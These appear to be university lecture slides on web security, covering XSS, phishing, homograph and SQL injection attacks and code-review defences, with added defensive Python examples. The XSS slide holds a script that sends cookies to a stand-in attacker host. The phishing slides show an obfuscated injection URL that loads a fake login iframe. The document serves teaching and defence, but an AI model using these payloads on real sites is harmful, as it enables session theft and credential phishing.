Web-security
Analysis of Software Artifacts
Vishal Dwivedi
vdwivedi@cs.cmu.edu

Agenda: Web Security
• Motivation
• Basics
• Key web security threats
• Designing for security
• Browser based defense mechanisms
• A discussion on some available tools and their capabilities
2

Vulnerabilities trend (mid-2008)
http://www-935.ibm.com/services/us/iss/xforce/midyearreport/xforce-midyear-report-2008.pdf
3

Web as a spreading point for malware
McAfee, Threat Predictions report 2009
http://www.mcafee.com/us/local_content/reports/2009_threat_predictions_report.pdf
4

The top 10 vulnerability list - 2007
1. Cross Site Scripting (XSS)
2. Injection Flaws
3. Malicious File Execution
4. Insecure Direct Object Reference
5. Cross Site Request Forgery (CSRF)
6. Information Leakage and Improper Error Handling
7. Broken Authentication and Session Management
8. Insecure Cryptographic Storage
9. Insecure Communications
10. Failure to Restrict URL Access
Source: OWASP (Open Web Application Security Project) Report
5

From the last software architecture lecture… @source: Dr David Garlan
To which model do the current web-applications fall in?
6

Web security: two sides
• Web browser: (client side)
– Attacks target weaknesses of browser security
– Result in:
• Malware installation
• Document theft
• Web application code: (server side)
– Runs at web site: banks, e-merchants, blogs
– Many potential bugs: XSS, XSRF, SQL injection
– Attacks lead to stolen personal information, defaced sites.
7

Discussing the basic elements of web
• URLs
• JavaScripts
• Cookies
• Session Ids
8

URL
http://www.some-website.com:80/x/y/z.html?user=Vishal&year=2008#p
URI Scheme: http
Host Name: www.some-website.com
Port Number: 80
Hierarchical portion: /x/y/z.html
Query: user=Vishal&year=2008
Fragment: p
<scheme name> : <hierarchical part> [ ? <query> ] [ # <fragment> ]
Source: http://en.wikipedia.org/wiki/URI_scheme
9

JavaScript in HTML
<body>
...
<!-- External Javascript File (a script element needs an explicit closing tag) -->
<script type="text/javascript" src="myCode.js"></script>
<!-- Inline Code -->
<script type="text/javascript">
//<![CDATA[
alert("Cookie:" + document.cookie);
//]]>
</script>
<!-- Event Handler -->
<p onclick="alert('I told you not to click on me!');">
Please do not click on this text.</p>
...
</body>
10

Cookies
Consist of attribute value pairs:
av-pairs = av-pair *(";" av-pair)
av-pair  = attr ["=" value]   ; optional value
attr     = token
value    = token | quoted-string
RFC 2965 http://tools.ietf.org/html/rfc2965
11

Session Ids
Session IDs have the form:
SID:type:realm:identifier[-thread][:count]
Example:
SID:ANON:www.w3.org:j6oAOxCWZh/CD723LGeXlf-01:34
SID:ANON:mc.ai.mit.edu:NRviSpoYm7mdkYB4W2471l-01:35
Most of the time: identifier = MD5 (realm + key), where the client stores the key, or bases it on system time.
A good session id should have "HIGH ENTROPY" and "LARGE ADDRESS SPACE"
12
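Added example (not from the slides): the clock-derived scheme the slide describes, identifier = MD5(realm + key) with the key taken from the system time, next to an identifier drawn from the OS CSPRNG, with the address space of each worked out. The realm, the timestamps and the function names are this example's own constructions.

```python
import hashlib
import math
import secrets

REALM = "www.example.org"  # constructed realm; the slide's own realms are not used


def weak_session_id(realm: str, t_ms: int) -> str:
    """The slide's weak scheme: identifier = MD5(realm + key), with the key
    taken from the system clock (milliseconds since the epoch)."""
    return hashlib.md5(f"{realm}{t_ms}".encode()).hexdigest()


def strong_session_id(n_bytes: int = 16) -> str:
    """Identifier drawn from the OS CSPRNG: 8 * n_bytes bits of entropy."""
    return secrets.token_hex(n_bytes)


def time_based_address_space_bits(window_ms: int) -> float:
    """Effective entropy of the clock scheme: someone who knows the realm and
    roughly when the session started only has window_ms candidates to try."""
    return math.log2(window_ms)


def random_address_space_bits(n_bytes: int) -> int:
    return 8 * n_bytes


def recover_weak_id(realm: str, observed: str, t_start_ms: int, window_ms: int):
    """Why 'large address space' matters: the clock scheme is exhaustible
    within a small window. Returns the clock value that reproduces `observed`,
    or None if it lies outside [t_start_ms, t_start_ms + window_ms)."""
    for t in range(t_start_ms, t_start_ms + window_ms):
        if weak_session_id(realm, t) == observed:
            return t
    return None


if __name__ == "__main__":
    issued_at = 1_230_000_123  # constructed timestamp (ms)
    sid = weak_session_id(REALM, issued_at)
    print("weak id reproduced at", recover_weak_id(REALM, sid, issued_at - 500, 1000))
    print("clock scheme, 1 h window:", round(time_based_address_space_bits(3_600_000), 1), "bits")
    print("16 random bytes:", random_address_space_bits(16), "bits ->", strong_session_id())
```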

Discussion on some web-security threats
XSS – Cross site scripting
CSRF – cross site request forgery
Session Hijacking
Homographic attacks
Defacement
Infiltration
Phishing
Pharming
Click Fraud
Denial of Service
Data Theft/Loss
13

Cross site scripting (XSS) attacks
http://www.virtualforge.de/vmovie/xss_lesson_1/xss_selling_platform_v1.0.html
<script>document.write('<img src="http://hackserver.example.com/grab.jsp?cookie=' + document.cookie + '">');</script>
14

Cross-site request forgery (CSRF/XSRF) attack
Exploit the trust of the website on a user's browser to perform one click operations.
Many websites (for example Google) use the same cookie for authentication to its multiple services.
15

Phishing
• Attacker sets up spoofed site that looks real
– Lures users to enter login credentials and stores them
– Usually sent through an e-mail with link to spoofed site asking users to "verify" their account info
– The links might be disguised through the click texts
– Wary users can see actual URL if they hover over link
16

Example:
https://www.unionstandardsb.com/script/LoginServlet?function=%22%3E%3Cscript%3Edocument.write%28String.fromCharCode%2860%2C115%2C99%2C114%2C105%2C112%2C116%2C62%2C60%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C99%2C121%2C98%2C101%2C114%2C99%2C114%2C105%2C109%2C105%2C110%2C97%2C108%2C98%2C97%2C110%2C107%2C46%2C99%2C111%2C109%2C47%2C108%2C111%2C103%2C105%2C110%2C46%2C112%2C104%2C112%2C62%2C60%2C47%2C115%2C99%2C114%2C105%2C112%2C116%2C62%29%29%3C/script%3E
17

Which is equivalent to:
https://www.unionstandardsb.com/script/LoginServlet?function="><script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,99,121,98,101,114,99,114,105,109,105,110,97,108,98,97,110,107,46,99,111,109,47,108,111,103,105,110,46,112,104,112,62))</script>
OR
<iframe src=http://www.cybercriminalbank.com/login.php>
18
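Added analyst-side example (not part of the slides): it performs the decoding the two slides above do by hand, percent-decoding the query parameter, evaluating each String.fromCharCode(...) call without running any JavaScript, and listing the hosts the injected markup points at. The sample input is the link reproduced on the slide; the function names are this example's own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The link from the slide, split across lines for readability (no other changes).
SAMPLE_URL = (
    "https://www.unionstandardsb.com/script/LoginServlet?function="
    "%22%3E%3Cscript%3Edocument.write%28String.fromCharCode%2860%2C115%2C99"
    "%2C114%2C105%2C112%2C116%2C62%2C60%2C105%2C102%2C114%2C97%2C109%2C101"
    "%2C32%2C115%2C114%2C99%2C61%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C119"
    "%2C119%2C119%2C46%2C99%2C121%2C98%2C101%2C114%2C99%2C114%2C105%2C109%2C105"
    "%2C110%2C97%2C108%2C98%2C97%2C110%2C107%2C46%2C99%2C111%2C109%2C47%2C108"
    "%2C111%2C103%2C105%2C110%2C46%2C112%2C104%2C112%2C62%2C60%2C47%2C115%2C99"
    "%2C114%2C105%2C112%2C116%2C62%29%29%3C/script%3E"
)

FROMCHARCODE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")


def decode_parameter(url: str, name: str) -> str:
    """Percent-decode one query parameter (parse_qs does the %XX decoding)."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)[name][0]


def decode_fromcharcode(js: str) -> list[str]:
    """Evaluate each String.fromCharCode(n, n, ...) call statically."""
    return [
        "".join(chr(int(n)) for n in args.split(",") if n.strip())
        for args in FROMCHARCODE.findall(js)
    ]


def referenced_hosts(markup: str) -> set[str]:
    return set(re.findall(r"https?://([A-Za-z0-9.-]+)", markup))


def analyze(url: str, param: str = "function") -> dict:
    decoded = decode_parameter(url, param)
    revealed = decode_fromcharcode(decoded)
    return {
        "decoded": decoded,
        "revealed": revealed,
        "hosts": set().union(*(referenced_hosts(s) for s in revealed)),
        # A leading "> closes the attribute the parameter is echoed into.
        "breaks_out_of_attribute": decoded.startswith('">'),
        "injects_script": "<script" in decoded.lower(),
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_URL).items():
        print(f"{key}: {value}")
```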

What's the difference between the two URL's?
www.paypal.com and www.pаypal.com
Let's copy both to our browser and check out.
19

Homographic attack
Similar looking characters were used to register a website having a different DNS address.
Pаypal: the а is a Cyrillic character [p&#1072;ypal.com]
Which points to http://www.xn--pypal-4ve.com/
20
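Added example (not from the slides): a check for the homograph shown above that flags labels mixing scripts and prints the punycode form the resolver actually sees, which for the Cyrillic-а hostname on the slide is the xn--pypal-4ve.com name the slide gives. Only the standard library is used; the function names are this example's own.

```python
import unicodedata


def script_of(ch: str) -> str:
    """Script as the first word of the Unicode name: 'LATIN', 'CYRILLIC', ..."""
    return unicodedata.name(ch, "UNKNOWN").split(" ")[0]


def mixed_script_labels(hostname: str) -> list[dict]:
    """Labels whose letters come from more than one script, with the non-Latin
    characters spelled out so a reviewer can see what was substituted."""
    findings = []
    for label in hostname.split("."):
        letters = [c for c in label if c.isalpha()]
        scripts = {script_of(c) for c in letters}
        if len(scripts) > 1:
            findings.append({
                "label": label,
                "scripts": sorted(scripts),
                "non_latin": [(c, unicodedata.name(c)) for c in letters if script_of(c) != "LATIN"],
            })
    return findings


def to_punycode(hostname: str) -> str:
    """The ASCII (xn--) form that DNS resolves, i.e. where the link really points."""
    return hostname.encode("idna").decode("ascii")


def check(hostname: str) -> dict:
    findings = mixed_script_labels(hostname)
    return {"punycode": to_punycode(hostname), "mixed_script": bool(findings), "labels": findings}


if __name__ == "__main__":
    # The two hostnames from the slide; the second one contains Cyrillic а (U+0430).
    for h in ("www.paypal.com", "www.p\u0430ypal.com"):
        print(h, check(h))
```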

Pharming
• Like phishing, attacker's goal is to get user to enter sensitive data into spoofed website
• DNS Cache Poisoning – attacker is able to redirect legitimate URL to their spoofed site
• DNS translates URL to appropriate IP address
• Attacker makes DNS translate legitimate URL to their IP address instead and the result gets cached, poisoning future replies as well
21

Injection Flaws
• Injection flaws occur when user-supplied data is passed to an interpreter as part of a command or query.
• These may be used to invoke external commands like shell commands, scripts etc to access local files, SQL data, LDAP data or Xpath/XSLT/XML content.
Example: SQL injection
Normal: SELECT * FROM customers WHERE username = 'vishal'
Injection: SELECT * FROM customers WHERE username = '' OR 1''
22
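Added example (not from the slides): the slide's customers query built by string concatenation beside the same query with a bound parameter, run against a constructed in-memory SQLite table so the difference in returned rows is visible. Table contents and function names are this example's own.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for the slide's customers table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (username TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO customers VALUES (?, ?)",
        [("vishal", "vishal@example.org"),
         ("alice", "alice@example.org"),
         ("bob", "bob@example.org")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """The flaw on the slide: the user-supplied value becomes part of the SQL
    text, so a quote in it changes the structure of the WHERE clause."""
    query = "SELECT * FROM customers WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, username: str) -> list:
    """Hardened form: the value is bound as a parameter and never parsed as
    SQL, so the same input is compared literally against the column."""
    return conn.execute(
        "SELECT * FROM customers WHERE username = ?", (username,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    for value in ("vishal", "' OR '1'='1"):
        print(repr(value),
              "vulnerable ->", len(lookup_vulnerable(db, value)), "rows;",
              "parameterized ->", len(lookup_parameterized(db, value)), "rows")
```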

Session Hijacking
Guessing/Hacking the session-id stored in the cookies
Mostly used with a combination of following attacks:
- Cross site scripting
- Session sidejacking
23

Defacement
24

Denial of Service attack
Image copyright @ACM (http://www.acm.org/crossroads/xrds10-1/tracingDOS.html)
• Attempt to make a computer resource unavailable to its intended users
Example:
• Saturating the target (victim) machine with external communications requests
25

Worms – example Conficker
Is downloaded as malware
It runs into an infinite loop where it generates 150 domain names and propagates by connecting to the external databases and replicating itself on the host sites
Source: SRI Technical report http://mtc.sri.com/Conficker/
26

Source: SRI Technical report http://mtc.sri.com/Conficker/
27

Utilizing RPC buffer overflow to update
Source: SRI Technical report http://mtc.sri.com/Conficker/
28

Let's analyze the code of a simple virus implemented in C
29

How Viruses/Worms work: a brief discussion

Other vulnerabilities
• API Abuse
• Authentication Vulnerability
• Authorization Vulnerability
• Availability Vulnerability
• Code Permission Vulnerability
• Code Quality Vulnerability
• Concurrency Vulnerability
• Configuration Vulnerability
• Cryptographic Vulnerability
• Encoding Vulnerability
• Environmental Vulnerability
• Input Validation Vulnerability
• Logging and Auditing Vulnerability
• Password Management Vulnerability
• Path Vulnerability
• Protocol Errors
• Range and Type Error Vulnerability
• Sensitive Data Protection Vulnerability
• Session Management Vulnerability
• Synchronization and Timing Vulnerability
• Unsafe Mobile Code
• Use of Dangerous API
• General Logic Error Vulnerability
• Error Handling Vulnerability
And many more
Source: OWASP (http://www.owasp.org)
30

Designing for security
The standard defense mechanisms
Adhering to basic principles
Threat modeling
31

The standard security mechanisms
1. Authentication
2. Authorization
3. Confidentiality
4. Data / Message Integrity
5. Accountability
6. Availability
7. Non-Repudiation
32

Standard Security Principles
Compartmentalize
Use least privilege
Apply defense in depth
Do not trust user input
Check at the gate
Fail securely
Secure the weakest link
Create secure defaults
Reduce your attack surface
33

Threat Modeling
Application Type                                  Most Significant Threat
Civil Liberties web site / White House web site   Defacement
Financial Institution / Electronic Commerce       Compromise one or more accounts; Denial-of-Service
Military Institution / Electronic Commerce        Infiltration; access to classified data
34

Testing for web-security bugs: Code Review
Main task: Identify and minimize the Attack surface
Probable Inputs: Browser input, Cookies, Property files, External processes, Data feeds, Service responses, Flat files, Command line parameters, Environment variables
Perform a data flow analysis considering the major transactions which occur in the application, for example:
• Data/Input Validation of data from all untrusted sources
• Authentication
• Session Management
• Authorization
• Cryptography (Data at rest and in transit)
• Error Handling /Information Leakage
• Logging /Auditing
• Secure Code Environment
35

OWASP Code review steps
• Search for key indicators
• Identify HTTP request Strings
• Identify the responses to the client
• Identify all data accesses
• Check out cookie manipulation
• Search for vulnerable HTML tags
• Analyze input controls
• Analyze configuration files and passwords
• Analyze system errors
• Analyze permissions
Identify area of code with security implications, such as say a default JSP page being accessed by clients.
36

OWASP Code review steps
request.accepttypes, request.browser, request.files, request.headers, request.httpmethod, request.item, request.querystring, request.form, request.cookies, request.certificate, request.rawurl, request.servervariables, request.url, request.urlreferrer, request.useragent, request.userlanguages, request.IsSecureConnection, request.TotalBytes, request.BinaryRead, InputStream, HiddenField.Value, TextBox.Text, recordSet
37

OWASP Code review steps
Example: response.write, <%=, HttpUtility, HtmlEncode, UrlEncode, innerText, innerHTML
38

OWASP Code review steps
Example: exec sp_executesql, execute sp_executesql, select from, Insert, update, delete from where
39

OWASP Code review steps
HtmlEncode, URLEncode, <applet>, <frameset>, <embed>, <frame>, <html>, <iframe>, <img>, <style>, <layer>, <ilayer>, <meta>, <object>, <body>, <frame security, <iframe security
40

OWASP Code review steps
requestEncoding, responseEncoding, trace, authorization, compilation, CustomErrors, httpCookies, httpHandlers, httpRuntime, sessionState, maxRequestLength, debug, forms protection, appSettings, ConfigurationSettings, appSettings, connectionStrings, authentication mode, allow, deny, credentials, identity impersonate, timeout, remote
41
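Added example (not from the slides) covering the key-indicator lists on the code review slides above: a line-oriented scan that joins the request sources, the response and SQL sinks and the encoders from those lists, and reports lines where request data reaches a sink with no encoder (XSS) or no parameter binding (SQLi). The sample source lines are constructed, and the notion of "parameterized" is this example's own assumption.

```python
import re

# Indicator lists from the slides above: where untrusted data enters,
# where it is written out, and the encoders whose absence is the finding.
SOURCES = re.compile(
    r"request\.(querystring|form|cookies|headers|item|rawurl|urlreferrer|useragent"
    r"|servervariables|binaryread)|TextBox\.Text|HiddenField\.Value|InputStream", re.I)
HTML_SINKS = re.compile(r"response\.write|<%=|innerHTML", re.I)
SQL_SINKS = re.compile(
    r"sp_executesql|\bselect\b.*\bfrom\b|\binsert\b|\bupdate\b|\bdelete\b.*\bfrom\b", re.I)
ENCODERS = re.compile(r"HtmlEncode|UrlEncode", re.I)
# Assumed markers of a parameterized statement: a bound @name, a ? placeholder,
# or a Parameters.Add* call on the same line.
PARAMETERIZED = re.compile(r"\.Parameters\.Add|\?\s*,|@\w+")


def review(lines):
    """One finding per line that joins a request source to a sink with no
    encoder (XSS) or no parameter binding (SQLi): (line number, kind, note)."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        if not SOURCES.search(line):
            continue
        if HTML_SINKS.search(line) and not ENCODERS.search(line):
            findings.append((lineno, "XSS",
                             "request data written to the response without HtmlEncode/UrlEncode"))
        if SQL_SINKS.search(line) and not PARAMETERIZED.search(line):
            findings.append((lineno, "SQLi",
                             "request data concatenated into a SQL statement"))
    return findings


# Constructed ASP.NET-style lines standing in for a code base under review.
SAMPLE_SOURCE = [
    'Response.Write(Request.QueryString["user"]);',
    'Response.Write(HttpUtility.HtmlEncode(Request.QueryString["user"]));',
    'string q = "SELECT * FROM customers WHERE username = \'" + Request.Form["u"] + "\'";',
    'cmd.CommandText = "SELECT * FROM customers WHERE username = @u"; '
    'cmd.Parameters.AddWithValue("@u", Request.Form["u"]);',
    '<%= Request.QueryString["msg"] %>',
    'log.Info("page hit");',
]

if __name__ == "__main__":
    for lineno, kind, note in review(SAMPLE_SOURCE):
        print(f"line {lineno}: {kind}: {note}")
```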

Browser based defense mechanisms
Sandboxing
Minimal Privileges
Separation of concerns
Cookie blocking
Browser warnings
42

Sandboxing
• Browser ("kernel")
– Full privileges (file system, networking)
– Coarse-grained security policies protect local system
• Rendering engine
– Sandboxed
– Fine-grained same origin policy enforcement
Source: Barth et al. "The Security Architecture of the Chromium Browser"
43

Minimal Privileges
Protected Mode in IE
• IE 7 in Vista is a "low rights" process
• Can prompt user to get more privileges
44

Preventing file theft
Through browser restrictions which impose restrictions on where the renderer:
- can write files (to fixed locations)
- can only upload files using the kernel's file picker
- can only use selected web schemes which are safe (http, https, ftp)
45

Separation of concerns between browser kernel and renderer
Source: Barth et al. "The Security Architecture of the Chromium Browser"
46

Cookie blocking
• Block the "Cookie" header for cross-domain resource loads
• Third-party cookie blocking already does this for privacy
• Third-party frames are ok
47

Browser Warnings
48

Testing for web-security bugs
Multiple commercial and open source tools exist today which automate the testing of web-application vulnerabilities (across the complete life cycle of web applications)
One such tool: HP Web-Inspect
OWASP provides a collection of open-source tools
Other tools include data flow analysis for executables (like IDA Pro)
49

Web-Scarab tool: analysis of HTTP and HTTPS session
50

Acts as an interceptor proxy and analyzes all requests which originate from an application
Could be used for analyzing sessions, cookies
51

User can generate inputs and the tool can analyze if they are valid.
Although it is difficult to secure everything all the time!!
But the following definitely helps:
• Good coding practices
• Learning from mistakes
• Being security conscious
• Considering how an attacker can harm
At any time, you can find N number of PCs at CMU with default login passwords (admin/admin) for their tomcat servers.
Well we are not alone: Until recently the login/password for Indian tax portal (http://incometaxindia.gov.in) was admin/admin
52

Thanks!!
Vishal Dwivedi
vdwivedi@cs.cmu.edu
53